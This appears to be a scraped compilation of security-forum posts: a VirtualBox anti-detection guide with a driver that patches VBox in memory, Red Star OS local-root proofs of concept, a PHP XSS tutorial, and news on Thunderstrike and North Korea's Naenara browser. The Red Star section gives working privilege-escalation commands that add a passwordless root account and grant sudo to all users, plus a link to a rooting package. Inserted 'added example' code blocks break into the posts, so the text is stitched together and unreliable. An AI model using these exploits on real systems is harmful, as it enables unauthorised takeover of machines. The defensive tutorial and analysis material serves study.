%vboxman% modifyvm "%1" --macaddress1 6CF0491A6E02
cd /d %vmscfgdir%
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/DsdtFilePath" "%vmscfgdir%ACPI-DSDT.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/acpi/0/Config/SsdtFilePath" "%vmscfgdir%ACPI-SSDT1.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/vga/0/Config/BiosRom" "%vmscfgdir%videorom.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/BiosRom" "%vmscfgdir%pcbios.bin"
%vboxman% setextradata "%1" "VBoxInternal/Devices/pcbios/0/Config/LanBootRom" "%vmscfgdir%pxerom.bin"
%vboxman% modifyvm "%1" --bioslogoimagepath "%vmscfgdir%splash.bmp"
@pause
```

NOTE: These two settings:
VBoxInternal/Devices/acpi/0/Config/DsdtFilePath
VBoxInternal/Devices/acpi/0/Config/SsdtFilePath
are supported by VirtualBox (it has code to load and work with this data), but they are not listed as acceptable by VirtualBox. If you are interested in more details see the VirtualBox source:
src\VBox\Devices\PC\ACPI\VBoxAcpi.cpp -> Dsdt/Ssdt
src\VBox\Devices\PC\DevACPI.cpp -> CFGMR3AreValuesValid
The only way we can use them is to force VirtualBox to allow them. Without this patch both settings will not be recognized by VBox as acceptable and the VM won't start.

Additionally, even after heavy reconfiguring, some virtual machine device data will still point to Oracle: the PCI HWIDs (hardware identifiers). For more info about possible VM detection methods see our VMDE. The only way we can change these IDs is a memory patch of VBoxDD.dll, where most of the VM-related logic is located. Unfortunately, in a pathetic attempt to stop VirtualBox exploitation attempts, Oracle decided to create a kind of "patchguard" for VBox, known as "Hardened VirtualBox". See viewtopic.php?f=11&t=1911&start=50 for more details.

2.3) Installing the AntiVMDetect helper. Use loader.exe from the attachment. It is a command line utility which serves the purpose of bypassing the Hardened VirtualBox crap. Without parameters it will show the list of possible commands. "tsugumi" is a kernel mode x64 driver used for VBox patching.

-l command. Example of usage, installation batch script (must be run with admin privileges):
```bat
D:\Virtual\Vbox\Settings\loader.exe -l
@pause
```
This command loads the driver, which then starts monitoring VirtualBox DLL loading.

-u command. Example of usage, uninstallation batch script (must be run with admin privileges):
```bat
D:\Virtual\Vbox\Settings\loader.exe -u
@pause
```
This command unloads the tsugumi driver and flushes the Windows file cache and standby list, so Windows is forced to reload the DLLs from disk into memory and VirtualBox will be able to use unpatched DLLs.

What/where: the patch data is stored in the "Tsugumi" driver key under the "Parameters" subkey in the "PatchData" value -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\tsugumi\Parameters. The loader stores the patch information here and the driver uses it later.

Note: the driver ONLY patches ONE VirtualBox DLL in memory; nothing else in the system is modified.

This mechanism supports providing custom patch data: you can specify the path to a custom patch data file as the second parameter of the "-l" command, e.g.
loader.exe -l "c:\vbox\mycustompdata.bin"

Patch data is described as a set of linked chains:
```c
typedef struct _BINARY_PATCH_BLOCK {
    ULONG VirtualOffset;
    UCHAR DataLength;
    UCHAR Data[1];
} BINARY_PATCH_BLOCK, *PBINARY_PATCH_BLOCK;
```
Where:
VirtualOffset - the virtual offset in the VirtualBox VBoxDD DLL.
DataLength - length of the input patch data.
Data - your input data to write, DataLength bytes long.

Once the patch driver is installed by the loader it will enable the ACPI-table-related settings, fake HWIDs and patch several instructions with hardcoded VBox signatures. This driver has no interface; it works semi-automatically, relying only on the PatchData described above. All source of the loader, driver and support tools can be found in the attachment.

3) VirtualBox VM installation and configuring

3.1) Create a new virtual machine (in this example it is named "sbox") and configure it in the following way:
- Motherboard
- Processor
- Acceleration (make sure your CPU supports virtualization technologies)
- Display (UNCHECK any kind of acceleration here - a totally bugged and previously exploited feature)
- Storage*
- Network**

* We use an IDE controller here; you can use AHCI, it is not important. Better use dynamically allocated VDI images with a size of not less than 16 GB, as HDD size is a VM indicator for some lame malware.
** For example, used to access the host computer via FTP and provide web access to the virtual machine and malware.

3.2) Install Windows (any you want; in this example we used a machine with Windows XP SP3 RTM). DO NOT INSTALL VirtualBox Additions. NEVER. Once installed you may consider your VM as lost. How then to copy all your instruments/tools/etc. into the VM? Prebuild an ISO image, copy all your stuff onto it, and use the VM CD-ROM drive for it. Copy a small FTP client to the VM and use Host-FTP-Server -> Guest-FTP-Client. In this example we copied everything we need onto a prebuilt ISO image called VBoxAfterInstall.ISO, mounted it in the virtual CD-ROM and then used our self-made FTP server for other file transfers to the VM.

Attachment structure:
loader.exe - driver loader
install.cmd - runs loader with -l param, needs admin rights
uninstall.cmd - runs loader with -u param, needs admin rights
data - modified and original data from VBox 4.3.16, batch scripts
loader - partial source code of loader
driver - partial source code of loader, use WDK to build
util:
  -> biosextract - tool and its source to extract BIOSes from VirtualBox's VBOXDD2.DLL
  -> vmde - test tool to detect VM presence
  -> patchlist - test tool for patch hex construction

Note: for patching the DSDT table, be aware that it is CRC protected, so you need to re-calculate and write the proper CRC, otherwise your customized machine won't load (https://taesoo.org/files/code/acpi.c.html).
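The closing note is the step most likely to leave a customized VM unbootable, so here is the integrity check spelled out. Every ACPI table (DSDT and SSDT alike) starts with a 36-byte header whose byte 9 is an 8-bit checksum chosen so that all bytes of the table sum to zero modulo 256; that is the "CRC" the note refers to, and it has to be recomputed after any edit, including the OEMID / OEM Table ID fields that the AcpiOemId setting and a hand-edited DSDT change. The Python below is an added example and is not part of this guide or of the AntiVMDetect package: it builds a constructed, non-bootable DSDT-shaped stand-in (real header layout over placeholder body bytes), rewrites the OEM fields, re-seals the checksum and verifies it. The sample OEM strings are constructed values.

```python
import struct

# Standard 36-byte ACPI table header (little-endian, packed):
# Signature(4) Length(4) Revision(1) Checksum(1) OEMID(6) OEM Table ID(8)
# OEM Revision(4) Creator ID(4) Creator Revision(4)
ACPI_HEADER = struct.Struct("<4sIBB6s8sI4sI")
CHECKSUM_OFFSET = 9
OEMID_SLICE = slice(10, 16)
OEM_TABLE_ID_SLICE = slice(16, 24)


def acpi_checksum_ok(table: bytes) -> bool:
    """A table is valid when all its bytes, checksum byte included, sum to 0 mod 256."""
    return sum(table) % 256 == 0


def fix_acpi_checksum(table: bytes) -> bytes:
    """Recompute byte 9 so the whole table sums to zero (what the note calls the CRC)."""
    t = bytearray(table)
    t[CHECKSUM_OFFSET] = 0
    t[CHECKSUM_OFFSET] = (-sum(t)) & 0xFF
    return bytes(t)


def _pad(s: str, n: int) -> bytes:
    """ACPI string fields are fixed width, space padded, not NUL terminated."""
    return s.encode("ascii")[:n].ljust(n, b" ")


def set_oem_fields(table: bytes, oem_id: str, oem_table_id: str) -> bytes:
    """Rewrite the OEMID / OEM Table ID header fields and re-seal the checksum."""
    if len(table) < ACPI_HEADER.size:
        raise ValueError("table shorter than an ACPI header")
    t = bytearray(table)
    t[OEMID_SLICE] = _pad(oem_id, 6)
    t[OEM_TABLE_ID_SLICE] = _pad(oem_table_id, 8)
    return fix_acpi_checksum(bytes(t))


def read_header(table: bytes) -> dict:
    """Decode the fields a detector would compare against hypervisor signatures."""
    sig, length, rev, csum, oemid, oemtid, oemrev, cid, crev = ACPI_HEADER.unpack_from(table)
    return {
        "signature": sig.decode("ascii"),
        "length": length,
        "checksum": csum,
        "oem_id": oemid.decode("ascii").rstrip(),
        "oem_table_id": oemtid.decode("ascii").rstrip(),
        "creator_id": cid.decode("ascii").rstrip(),
    }


def build_sample_dsdt(oem_id: str = "VBOX", oem_table_id: str = "VBOXBIOS") -> bytes:
    """Constructed stand-in for a dumped DSDT: a real header over a few placeholder
    body bytes. Not a bootable table; only the header and checksum handling is real."""
    body = b"\x10\x2e\x5f\x53\x42\x5f"  # placeholder body bytes, constructed
    header = ACPI_HEADER.pack(b"DSDT", ACPI_HEADER.size + len(body), 2, 0,
                              _pad(oem_id, 6), _pad(oem_table_id, 8), 1, b"VBOX", 1)
    return fix_acpi_checksum(header + body)


if __name__ == "__main__":
    original = build_sample_dsdt()
    patched = set_oem_fields(original, "ASUS", "NOTEBOOK")
    print(read_header(patched), acpi_checksum_ok(patched))
```

For a real ACPI-DSDT.bin the same functions apply unchanged: read the file, call set_oem_fields (or fix_acpi_checksum after any other edit), and confirm acpi_checksum_ok before pointing DsdtFilePath at the result. The creator ID and the Length field are left alone here on purpose; Length must be corrected too if the body size changes, and the checksum is then recomputed over the new length.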
05/01/15 update

loader changes
+ Resolved a few startup issues;
+ Support for new Microsoft versioning;
+ Built-in tables for 4.3.16, 4.3.18 and 4.3.20 versions, so you no longer need to load them as an external file (however you still can do that by supplying the patch table filename as second parameter to the loader);
+ "VirtualBox Host-Only Network" connection no longer needs to be disabled for starting this loader, it will disable and re-enable it automatically;
+ New presets for EFI (IDE/AHCI) VirtualBox machines (see hidevm_efiahci.cmd, hidevm_efiide.cmd). Note: EFI is supported by VirtualBox only from 4.3.20;
+ Updated all bios data and ACPI tables up to the current 4.3.20 version;
+ More source included; source that wasn't changed (driver) is not included in this pack.

VBOX Pass: virtualbox

Source
-
RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)

Red Star 2.0 desktop ships with a world-writeable "/etc/rc.d/rc.sysinit" which can be abused to execute commands on boot. An example exploitation of this vulnerability is shown here https://github.com/HackerFantastic/Public/blob/master/exploits/redstar2.0-localroot.png

PoC:

/bin/echo "r00t::0:0::/tmp:/bin/bash" >> /etc/passwd
su - root

## Source: http://www.openwall.com/lists/oss-security/2015/01/09/6
Source

RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)

The root user is disabled on Red Star, and it doesn't look like there is a way to enable it. Unfortunately, they left a big security hole: the Software Manager (swmng.app), which runs as root through sudo and will install any RPM package, even if unsigned. To get root, get this RPM package I made into Red Star through an ISO (if you're using a virtual machine) or USB key, double-click it to open it with the Software Manager, and click through the blue buttons until it's done. After that, run rootsh to get a root shell. Being a RedHat-based system (hinting at Fedora 15), SELinux will prevent you from doing some things, but disabling it is a matter of running setenforce 0 as root.
Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E
Mirror: http://www.exploit-db.com/sploits/redstarroot.rpm

## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1
Source

RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)

#!/bin/bash -e
cp /etc/udev/rules.d/85-hplj10xx.rules /tmp/udevhp.bak
echo 'RUN+="/bin/bash /tmp/r00t.sh"' > /etc/udev/rules.d/85-hplj10xx.rules
cat <<EOF >/tmp/r00t.sh
echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers
mv /tmp/udevhp.bak /etc/udev/rules.d/85-hplj10xx.rules
chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules
rm /tmp/r00t.sh
EOF
chmod +x /tmp/r00t.sh
echo "sudo will be available after reboot"
sleep 2
reboot

## Source: https://twitter.com/sfan55/status/550348619652796416 & http://www.openwall.com/lists/oss-security/2015/01/09/6
Source
-
- 1
-
@cubedjno1 first of all, to modify the index (deface) of a site you need to gain access to that site (unauthorized access to a computer system is punishable), which would mean a CRIME (nobody here deals with such things); as long as the site is not yours we cannot help you. The question is childish.
-
Introduction

In this part of the series, we are going to examine the different ways to escape HTML characters in PHP in order to add security to your web project. We will also give a brief introduction to PHP's Perl-compatible regular expressions and show how they can be used for input validation. We are also going to examine PHP 5's built-in input validation and filtering methods (focusing mostly on filter_var).

Transforming HTML characters

If we have some code, for example a search engine in our website which responds to GET parameters and has the following snippet:

SNIPPET 1

A legitimate user might get a page resembling something like this:

However, any user is going to be able to add tags to the queries and at the very least drastically change the way your page is formatted. For example, he can target particular browsers and send links with malicious GET parameters which would load external JavaScript files. Above is an example of how we can easily change both HTML and CSS on the page (a relatively harmless example).

htmlspecialchars

To combat this, we can use htmlspecialchars(), htmlentities() or strip_tags(). htmlspecialchars() takes a string and, as optional parameters, 'flags', the 'encoding' to be used when converting the characters and a 'double encoding' option which is set to true by default and, when turned off, forces PHP not to encode existing HTML entities. A sample usage would prevent such XSS vulnerabilities and show the tags instead of applying them:

SNIPPET 2

However, htmlspecialchars only changes the ampersand, double quotes, and less-than and greater-than symbols by default. Thus, we could still get undesired effects. For example, here is a sample way to apply tags when the single quotes are not escaped.
Suppose we have the following snippet:

SNIPPET 3

A legitimate request would look like this:

The line just adds a link to the page that points to an HTML file (it would be dynamically generated) named after the sought keyword and displays the keyword as the text child node of the anchor. You can see that the $query variable is passed to the anchor and to the text which contains the input escaped with htmlspecialchars(). However, consider if the user tries to see whether the single quote is also escaped and types something like:

http://localhost:8079/Tests/index.php?q=Chocolate' style='font-size:5em'

Then the user has successfully closed our anchor tag and added an arbitrary attribute. He can then try to add inline JavaScript and keep on testing for ways to exploit the vulnerability.

Figure 1: After the single quote exploit
Figure 2: Legitimate request (the anchor before the exploit)

To fix this, we just pass the ENT_QUOTES flag.

SNIPPET 4

After we escape the single quotes as well, this vulnerability vanishes. To transform an escaped string containing markup back to markup, again we use: htmlspecialchars_decode($query);

Strip Tags

If you want to be more radical, you can remove all HTML and PHP tags from a string or remove only a selection of them. The built-in function strip_tags() takes a string in which to remove the tags and optionally another string that pinpoints which tags are allowed.

SNIPPET 5

The above code results in all tags being removed from the string. Optionally, we can allow any tag we want, but we have to do some manual escaping as users can enter whatever attributes they want. Of course, contemporary browsers have XSS protection, but there are still clients with older systems that could be targeted with such malicious links.

SNIPPET 6

We get an error in the console telling us that the XSS Auditor did not execute the script on up-to-date Chrome, but this would not necessarily be the response all users will get.
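The article's snippets are not reproduced on this page, so here is an added example of my own (not the author's code) covering the single-quoted attribute case above and the strip_tags() allow-list point: the weak escaping that lets a single quote close the href attribute, the ENT_QUOTES version that does not, and an allow-listed strip_tags() call followed by removal of attributes from the tags that survive. The function names and the $probe value are mine; the probe mirrors the article's test request.

```php
<?php
// Added example, not the article's snippets: escaping a value that lands in
// an attribute delimited with single quotes, before and after ENT_QUOTES.

// Weak: ENT_COMPAT (the default before PHP 8.1) converts &, <, > and " only,
// so a value containing ' closes the href attribute and injects a new one.
function render_link_weak(string $query): string
{
    $escaped = htmlspecialchars($query, ENT_COMPAT, 'UTF-8');
    return "<a href='{$escaped}.html'>{$escaped}</a>";
}

// Safe: ENT_QUOTES also converts ' to &#039;, so the value stays inside the
// attribute. ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an
// empty string, which would otherwise silently drop the whole value.
function render_link_safe(string $query): string
{
    $escaped = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<a href='{$escaped}.html'>{$escaped}</a>";
}

// strip_tags() with an allow-list keeps the listed tags but leaves their
// attributes untouched, so event-handler attributes on <b> or <i> survive
// the call and still have to be removed by hand.
function strip_to_bold_italic(string $input): string
{
    $kept = strip_tags($input, '<b><i>');
    // Drop every attribute from the surviving <b>/<i> opening tags.
    return preg_replace('/<(b|i)\b[^>]*>/i', '<$1>', $kept);
}

// Constructed probe mirroring the article's request
// (?q=Chocolate' style='font-size:5em).
$probe = "Chocolate' style='font-size:5em";

echo render_link_weak($probe), PHP_EOL;   // attribute breakout
echo render_link_safe($probe), PHP_EOL;   // single quote encoded, no breakout

// Constructed input: an allowed tag carrying an attribute plus a script tag.
echo strip_to_bold_italic('<b onmouseover="x">bold</b> <script>alert(1)</script>'), PHP_EOL;
```

Run it with php from the command line. The weak variant emits the probe's style attribute as a real attribute of the anchor; the safe variant keeps the whole probe inside the href and the text node. The last line shows that strip_tags() alone would have kept the onmouseover attribute on the allowed <b> tag.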
Htmlentities

Another function you can use is htmlentities(). The difference between htmlspecialchars and htmlentities is that htmlentities translates all HTML characters with entity equivalents to the particular entities. This basically means that it also applies to entities such as © (the copyright symbol), € (the euro symbol) and all others. For example, if we use htmlspecialchars() and enter the euro sign we will get the following result:

However, if we use htmlentities, the euro character will be properly translated to its relevant HTML entity:

It is important to know that the default flag of htmlentities() is ENT_COMPAT, which only converts double quotes (single quotes are not translated like they are in htmlspecialchars()). Therefore, you also have to use ENT_QUOTES where appropriate:

SNIPPET 7

Validating input

For most purposes the built-in function filter_var can be used. It is available on servers with a PHP version greater than 5.2.0. It takes a variable or static input and returns false on failure and the filtered data on success. We can use it for validation and sanitization of input. It has to be mentioned that filter_var's validation mechanisms do not only tell you if the input is valid but also sanitize it by removing the illegal characters. Below is an example of how it works:

SNIPPET 8

This script will display that the email is legit if it is a valid email or display that the email is invalid if it is not.

There are also validation filters for Booleans (FILTER_VALIDATE_BOOLEAN) which return true only when the input is one of the following strings: "1", "true", "on", "yes". For every other string value it will return false.

Another validation filter is for floating point numbers (FILTER_VALIDATE_FLOAT) which does not return false when:
The input is a numeric floating point value (Example: 22.2)
The input is a string containing a floating point value (Example: "22.2", '22.2')
Optionally, you can pass an option: FILTER_FLAG_ALLOW_THOUSAND would allow a thousands separator such as a comma (,). FILTER_FLAG_ALLOW_SCIENTIFIC would allow the number to be in scientific notation (e, E) and there is also FILTER_FLAG_ALLOW_FRACTION.

The FILTER_VALIDATE_INT filter would return the filtered integer or false on failure to extract an integer. There are flags to allow octal and hexadecimal numbers (FILTER_FLAG_ALLOW_OCTAL and FILTER_FLAG_ALLOW_HEX) and the ability to extract a number from a specified range. Here is a sample:

Options are passed in a two-dimensional array. The parent array contains the 'flags' index and 'options' is a nested array with all options where the key is the option name and the value is the value that the option should have. Here is how we can validate an integer to be between 1 and 100 and allow hexadecimal values. When we pass 120, false (or 0) is returned and we get a message that the number is invalid:

Your int 0 is invalid. Redirect to form.

If we enter 85, 85 is stored in $int and we get this statement:

Your int 85 is legit. Save it into the database.

Similarly, if we use a hexadecimal value below 100 (let's say 10), the integer also passes the validation:

$int = filter_var("0xA", FILTER_VALIDATE_INT, $options);

We are going to show one last example with the URL filter:

SNIPPET 10

We are validating a URL and passing a flag to allow only URLs with a query string attached to them (a GET parameter). We get the following response:

Your URL is invalid. Redirect to form.

If we instead try the following URL, we will get a positive response:

$url = filter_var("http://www.dimoff.biz/?id=1", FILTER_VALIDATE_URL, $options);

Your URL http://www.dimoff.biz/?id=1 is legit. Save it into the database.

The drawback of the validation is that internationalized domain names would always fail validation (only Latin URLs will pass the test, those containing ASCII characters).
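Since the article's filter_var snippets are missing from this page, here is an added example of my own (not the author's code) that walks through the validators discussed in the two sections above: email, boolean, float with the thousands-separator flag, integer with a 1..100 range plus hexadecimal input, and URL with a required query string. Every helper returns null on failure so that a legitimate 0, false or empty result is not mistaken for "invalid". The helper names, the test values and the example.com addresses are mine.

```php
<?php
// Added example, not the article's snippets: input validation with
// filter_var(). Each helper maps filter_var's false-on-failure to null so
// the caller can tell "invalid" apart from a valid 0, false or "".

function validate_email(string $value): ?string
{
    $r = filter_var($value, FILTER_VALIDATE_EMAIL);
    return $r === false ? null : $r;
}

// FILTER_NULL_ON_FAILURE makes "0"/"false"/"off"/"no" return false and any
// string that is not a boolean word return null, instead of false for both.
function validate_bool(string $value): ?bool
{
    return filter_var($value, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE);
}

function validate_float(string $value, bool $allowThousand = false): ?float
{
    $flags = $allowThousand ? FILTER_FLAG_ALLOW_THOUSAND : 0;
    $r = filter_var($value, FILTER_VALIDATE_FLOAT, ['flags' => $flags]);
    return $r === false ? null : $r;
}

// Range check plus hexadecimal input, as in the article's 1..100 example:
// "0xA" is accepted as 10, "120" is rejected. 'options' carries the range,
// 'flags' the hex permission, in the two-level array filter_var expects.
function validate_int_in_range(string $value, int $min, int $max): ?int
{
    $options = [
        'options' => ['min_range' => $min, 'max_range' => $max],
        'flags'   => FILTER_FLAG_ALLOW_HEX,
    ];
    $r = filter_var($value, FILTER_VALIDATE_INT, $options);
    return $r === false ? null : $r;
}

// FILTER_FLAG_QUERY_REQUIRED rejects URLs that carry no query string.
function validate_url_with_query(string $value): ?string
{
    $r = filter_var($value, FILTER_VALIDATE_URL, FILTER_FLAG_QUERY_REQUIRED);
    return $r === false ? null : $r;
}

// Constructed inputs; example.com is a placeholder, not a real target.
$checks = [
    'email user@example.com'        => validate_email('user@example.com'),
    'email user@@example'           => validate_email('user@@example'),
    'bool yes'                      => validate_bool('yes'),
    'bool maybe'                    => validate_bool('maybe'),
    'float 1,234.5 (thousands ok)'  => validate_float('1,234.5', true),
    'float 1,234.5'                 => validate_float('1,234.5'),
    'int 85'                        => validate_int_in_range('85', 1, 100),
    'int 120'                       => validate_int_in_range('120', 1, 100),
    'int 0xA'                       => validate_int_in_range('0xA', 1, 100),
    'url http://example.com/'       => validate_url_with_query('http://example.com/'),
    'url http://example.com/?id=1'  => validate_url_with_query('http://example.com/?id=1'),
];

foreach ($checks as $label => $result) {
    $verdict = $result === null
        ? 'invalid. Redirect to form.'
        : 'legit (' . var_export($result, true) . '). Save it into the database.';
    echo $label, ' => ', $verdict, PHP_EOL;
}
```

The null-on-failure convention matters most for the boolean filter: with the plain call the article describes, "no" and "nonsense" both come back as false, so a form that wants to distinguish an explicit opt-out from garbage cannot do so without FILTER_NULL_ON_FAILURE.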
There are also filters to validate regular expressions and IP addresses (both IPv4 and IPv6). You can check filter_var_array(), which can filter multiple variables inserted in an array at once.

3.1 Validation through regular expressions

There are times when the built-in validations are not sufficient or do not include the validation you require. In such cases you can use preg_replace, preg_match, preg_match_all or preg_grep to do the job. For example, you may want to allow both Bulgarian and American zip codes. However, Bulgarian zip codes consist of 4 digits, whereas American zip codes consist of 5 digits. To do this you can use regular expressions:

SNIPPET 11

This regular expression tests if the input starts with a number which is repeated 4 or 5 times and then ends. Here are some tests:

Your zip code 23135 is legit. Save it into the database.
Your zip code 2313 is legit. Save it into the database.
Your zip code 231 is invalid. Redirect to form.
Your zip code 231352 is invalid. Redirect to form.

3.2 Regular Expressions 101

Regular expressions in PHP must start and end with the same delimiter (usually /expression/ is used).
^ checks whether the input starts with something.
$ checks whether the input ends with something.
A value in square brackets [ ] means one of a particular character, for example [Abc] means the input can either be A or b or c. [A-Z] means the input can be a single character anywhere between A and Z, for example M or D. Uppercase and lowercase characters differ, so you would have to use [A-Za-z] if you wanted any alphabetic character. Similarly you could use 0-9 or \d (which is almost the same but it includes some other characters).
? means the character preceding it can be repeated 0 or one time.
+ means it can be repeated one or more times.
* means the item can be repeated 0 or more times.
Alternatively you can provide a minimum number of repetitions [A-Z]{10} (at least 10 characters) or a minimum and maximum number of characters [0-9]{4,5}.
. stands for any character (.? would mean any character zero or one times).
To escape these characters that are used within regular expressions and test for their literal character, you use a backslash (\). For example, #[A-Z\+]#. There are also some escaped characters with special meanings such as \d for digit and \s for space.
Characters enclosed in brackets signify that the values should be captured for future use. For example, you may try the following regular expression:

preg_replace("/([0-9]{4,5})-([A-Z]+)/", "($1)$2", $input);

If you give it a string such as "5432-PA", it will transform it to become (5432)PA. preg_replace takes a regular expression as a first argument, the replacement string as second, and the variable to look into as third. In the replacement string, $0 would give the whole original string, $1 would be the first bracketed item, $2 the second and so on.

Also, a way to filter input is using the ^ symbol at the beginning of square brackets in a preg_replace call. It would mean replace everything different than the values following the caret (^). For example,

preg_replace("/[^\w]/", "", $input);

would cause input such as <script>alert()</script> to be filtered to "scriptalertscript". \w essentially matches all word characters and we are saying to replace all non-word characters with nothing.

Conclusion

We have covered some essential practices when working with input and we hope that you can start creating applications that are a little bit more secure and robust, or refactor existing projects by making them more secure with filter_var, regular expressions, or by filtering possible HTML coming from inputs.

Source
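As an added example of my own (not the article's SNIPPET 11 or its preg_replace calls), the following puts the zip-code validation from section 3.1 and the two preg_replace() patterns from section 3.2 into runnable functions. It also adds one caveat the article does not mention: in PCRE, $ matches before a trailing newline, so "23135\n" would pass the plain pattern; the D modifier closes that gap. The function names and the extra newline test case are mine; the other test values are the article's.

```php
<?php
// Added example, not the article's snippets: PCRE validation and filtering
// with preg_match() and preg_replace().

// Accepts a 4-digit (Bulgarian) or 5-digit (US) zip code and nothing else.
// The D modifier makes $ match only at the very end of the subject; without
// it "23135\n" also passes, because $ tolerates one trailing newline.
function validate_zip(string $value): bool
{
    return preg_match('/^[0-9]{4,5}$/D', $value) === 1;
}

// Capture groups: $1 is the 4-5 digit number, $2 the letters after the dash.
// "5432-PA" becomes "(5432)PA"; a subject that does not match is returned
// unchanged, so callers should not treat the result as proof of validity.
function reformat_code(string $input): string
{
    return preg_replace('/([0-9]{4,5})-([A-Z]+)/', '($1)$2', $input);
}

// Negated character class: everything that is not a word character is
// removed, so "<script>alert()</script>" collapses to "scriptalertscript".
// This is a whitelist filter, not an escaping step: it changes the data.
function keep_word_chars(string $input): string
{
    return preg_replace('/[^\w]/', '', $input);
}

// Constructed test values: the article's four zip codes plus a newline case.
foreach (['23135', '2313', '231', '231352', "23135\n"] as $zip) {
    printf(
        "Your zip code %s is %s%s",
        addcslashes($zip, "\n"),
        validate_zip($zip) ? 'legit. Save it into the database.' : 'invalid. Redirect to form.',
        PHP_EOL
    );
}

echo reformat_code('5432-PA'), PHP_EOL;
echo keep_word_chars('<script>alert()</script>'), PHP_EOL;
```

Dropping the D modifier and re-running shows the difference: the fifth test value then reports as legit even though it contains a newline, which is exactly the kind of input that later breaks a header or a database field.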
-
A vulnerability at the heart of Apple’s Mac OS X systems—one thus far only partially addressed by Apple—opens the door to the installation of malicious firmware bootkits that resist cleanup and give hackers persistent, stealthy control over a compromised Mac. The research is the work of a reverse engineering hobbyist and security researcher named Trammel Hudson, who gave a talk at the recent 31C3 event in Hamburg, Germany, during which he described an attack he called Thunderstrike. Thunderstrike is a Mac OS X bootkit delivered either through direct access to the Apple hardware (at the manufacturer or in transport), or via a Thunderbolt-connected peripheral device; the latter attack vector exposes vulnerable systems to Evil Maid attacks, or state-sponsored attacks where laptops are confiscated and examined in airports or border crossings, for example. The end result is the installation of malicious firmware on an Apple machine that would survive reinstallation of OS X or replacement of the Solid State Drive (SSD). Thunderstrike is undetectable, Hudson said, and can be used for root access to an infected computer, putting all of its data and web traffic at risk for interception and monitoring. Hudson began a dialogue with Apple about his findings in 2013 and Apple has addressed the issue with updated firmware shipping in MacMinis and iMac Retina computers. Macbooks, however, remain vulnerable because they are subject to downgrade attacks where an attacker could force older firmware vulnerable to this attack to run Thunderstrike, he said. Thunderstrike’s persistence, unlike other bootkits that would be wiped upon a re-installation of the operating system, for example, is due to its ability to write to the flash ROM on the motherboard, meaning that there’s nothing a software refresh would do to wipe it. Hudson’s bootkit takes advantage of a vulnerability in how Apple computers deal with peripheral devices connected over Thunderbolt ports during a firmware update. 
In these cases, the flash is left unlocked, allowing an Option ROM, or peripheral firmware, to run during recovery mode boots. It then has to slip past Apple’s RSA signature check. Apple stores its public key in the boot ROM and signs firmware updates with its private key. The Option ROM over Thunderbolt circumvents this process and writes its own RSA key so that future updates can only be signed by the attacker’s key. The attack also disables the loading of further Option ROMs, closing that window of opportunity. A weaponized version of this attack would have free ring0 reign over the system.

Hudson said this is the first OS X firmware bootkit he is aware of. “Since it is the first OS X firmware bootkit, there is nothing currently scanning for its presence. It controls the system from the very first instruction, which allows it to log keystrokes, including disk encryption keys, place backdoors into the OS X kernel and bypass firmware passwords,” Hudson said. “It can’t be removed by software since it controls the signing keys and update routines. Reinstallation of OS X won’t remove it. Replacing the SSD won’t remove it since there is nothing stored on the drive.”

Hudson said the possibility exists that Thunderstrike attacks could also eventually be done remotely given the Dark Jedi Coma research presented at 31C3 by Corey Kallenberg and Rafal Wojtczuk. Their talk exposed vulnerabilities in UEFI—the replacement for BIOS—and System Management Mode, a privileged execution mode on Intel machines. The vulnerabilities uncovered by Kallenberg and Wojtczuk allow an attacker to re-flash firmware and run their own malicious firmware. The Department of Homeland Security this week issued an advisory about these vulnerabilities.

Source
-
Up until a few weeks ago, the number of people outside of North Korea who gave much thought to the Internet infrastructure in that country was vanishingly small. But the speculation about the Sony hack has fixed that, and now a security researcher has taken a hard look at the national browser used in North Korea and found more than a little weirdness. The Naenara browser is part of the Red Star operating system used in North Korea and it’s a derivative of an outdated version of Mozilla Firefox. The country is known to tightly control the communications and activities of its citizens and that extends online, as well. Robert Hansen, vice president of WhiteHat Labs at WhiteHat Security, and an accomplished security researcher, recently got a copy of Naenara and began looking at its behavior, and he immediately realized that every time the browser loads, its first move is to make a request to a non-routable IP address, http://10.76.1.11. That address is not reachable from networks outside the DPRK. “Here’s where things start to go off the rails: what this means is that all of the DPRK’s national network is non-routable IP space. You heard me; they’re treating their entire country like some small to medium business might treat their corporate office,” Hansen wrote in a blog post detailing his findings. “The entire country of North Korea is sitting on one class A network (16,777,216 addresses). I was always under the impression they were just pretending that they owned large blocks of public IP space from a networking perspective, blocking everything and selectively turning on outbound traffic via access control lists. Apparently not!” What that does is give North Korean officials the ability to control exactly what traffic gets in and out of the country’s network. “One can presume that the intent of this huge local country-wide LAN would be to limit what users can access and also limit what can be accessed by outsiders,” Hansen said by email. 
That’s only one piece of the puzzle, though. Hansen also looked at the way the Naenara browser handles things such as email, calendars, certificates and other elements and found a lot of other oddities. For one, the country has implemented a system that enables it to determine precisely when a user installs the anti-phishing and anti-malware lists from the DPRK’s home base.

“That means the microtime of installation is sent to the mothership every single time someone pulls down the anti-phishing and anti-malware lists (from 10.76.1.11) in the browser. This microtime is easily enough information to decloak people, which is presumably the same reason Google built it into the browser,” Hansen said.

Also, any time a browser crashes, the report is sent back to the main DPRK IP address, giving the country valuable insights into what’s causing crashes, and perhaps, new vulnerability data. “Useful for debugging and also for finding exploits in Firefox, without necessarily giving that information back to Mozilla – a U.S. company,” Hansen said.

All email also is routed through the main IP address in North Korea, as are calendar entries. And, unsurprisingly, the Naenara browser only accepts one certificate–the one provided by the government. “That means it would be trivial to man in the middle any outbound HTTPS connection, so even if they do allow outbound access to Google’s JSON location API it wouldn’t help, because the connection and contents can be monitored by them,” Hansen said.

